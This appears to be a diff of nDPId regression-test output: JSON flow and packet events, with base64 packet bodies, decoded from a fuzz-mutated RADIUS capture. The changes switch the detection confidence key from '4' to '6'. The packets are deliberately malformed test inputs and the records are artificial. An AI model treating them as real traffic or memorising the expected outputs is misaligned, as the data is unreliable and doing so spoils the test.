-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528996068129,"flow_last_seen":1528996521508,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996068005,"flow_last_seen":1528996068005,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.102.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996067791,"flow_last_seen":1528996067791,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"108.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528996068129,"flow_last_seen":1528996521508,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1528996521508,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1528996603395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996603395,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMpAAP8RAAAKDEAexuIZNXIQBxUCxwAABA4Cv7R7V6BSrXIqRSnri9UTMJ0aCnIAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlk3TEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yi0GAAAAAUAGAAAADUEGAAAABlEENTY3BlsiovsaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXSBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhcnVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAAAAIqBgFYQ8k0BgAAAAArBpKpaYo1BgAAAAAvBgAD8PkwBgAY5WwxBgAAAAYuBgAAAewpBgAAAAAfE2YwLTc5LTYwLWQxLTdkLTM3HiUwMC1hNy00Mi1kMC1lMC0wMDpWZXJpem9uV2lGaUFjY2RzcxoMAAAFgwcGwFBKmQ=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996603490} 00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":147,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":147,"pkt_l4_len":0,"thread_ts_msec":1528996603395,"pkt":"ABRP+4qfcNuYqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1528996609526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1528996609526,"pkt":"AAAMB6xAABRP+4rqCABFAANeIMtAAP8RAAAKDEAexuIZNXIQBxUDSgAABA8DQohFBlHb2YvdG6PaZMpxlt8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwATUwMzExFDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmd+CDFjYXNjbwUGAAAACAQGrBQBEAgGrBQBFWEUAED+gAAAAAAAAAAAAAAAAAAAGYhTQlIyQ0zl2aywoICAgICAEYBzAYAUgZ6M7PeDwdzlup3t95Os3O+5mefgAoA7gZiM5pOJ0PCwmaemg8HY6LaZjoiHu7HC7pebreaZ0PCwl5ustpnM4rGXjOz3g8Hc5bqd7feTrNzvuZngEoAOgeXZrLCi7MWgzYCAgICgFZAGgIzA6rWCjCAOVlpXQzJUZXN0TGFiGgwAADdjAQYAAAACLCI1YjIyYTBmZS8wMDo1NjpjZDo2ZDo0Mjo1OS8yMDc9BgAAABMaMQAAAAkBK2F1ZGl0LXNlc3Npb24taWQ9MTBmZjEwYWMwMDAwMDBiM2ZlYTAyMjViLQYAAAABQAYAAAANQQYAAAAGUQQ1Njeqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} @@ -40,10 +40,10 @@ 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1528996680808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528996680808,"pkt":"ABRP+4rqcNuYVcUnCABFAADA98dAAPwRXCPG4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1528996684582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996684582,"pkt":"AAAMB6xAJQBP+4r3CABFAALbINFAAP8RAAAKBEAexuIZNXIQBxQCxwAAARUCv2qbhqMMM0mMg0ptdOqiEGYaCgAAV8gOBFVTGgwAAFPIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqNMATUwMzExNDgwMjc4NTAxMDA5QHdsYW4ubW5jNKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996684582,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1528996689402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996689402,"pkt":"ABRP+4rqcNuYVcUnCABFAAClbuVAAPwRXCDG4hk1CgxAHgcUclYAkWdmCxcAiQrIitkB1LgR0s5zEPVzzzIBNTAzMTE0dzAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDgvNjQ6YjA6YTY6MGU6YTQ6ZWMvMjEyTw4BAAAMFwwAAHYBf\/xQEjLibctMfYgZSgHqxKHsV1U="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996689587} 00561{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996689524,"pkt":"ABRP+4rqcNuYVcUnCABFAADA9+klAPwRXAHG4hk1CgxAHgcUchAArPtqAxgApNkk5fehx32PqouJEXUDfwgBNTAzMTE0ODAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDkvNjQ6YjA6YU06uGU6YTQ6ZWMvMjEyeCIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8lAAEABwBQEslNLvLV5rc9WbdNXraRxZQ="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":200000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996733156,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -54,29 +54,29 @@ 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996736731,"pkt":"ABRP+4rqcNuYVcUnCABFAADA+HNBAPwRW3fG4hk1CgxAHgcUchAArIw9AxwApBZ8i1l5y5I6R7UN7fbGLQ0BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLhNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2PpYjA6OWY6YmE6NGE6MGU6N2UvMjEzEiIzMjc2NCBTdWJzY3JpYmVyJWlvdCBwcm92aXNpb25lZE8HBAEABwBQEhu6bMXdvKMo\/pphwZK5oRM="} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":200000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528996832079,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996990566,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 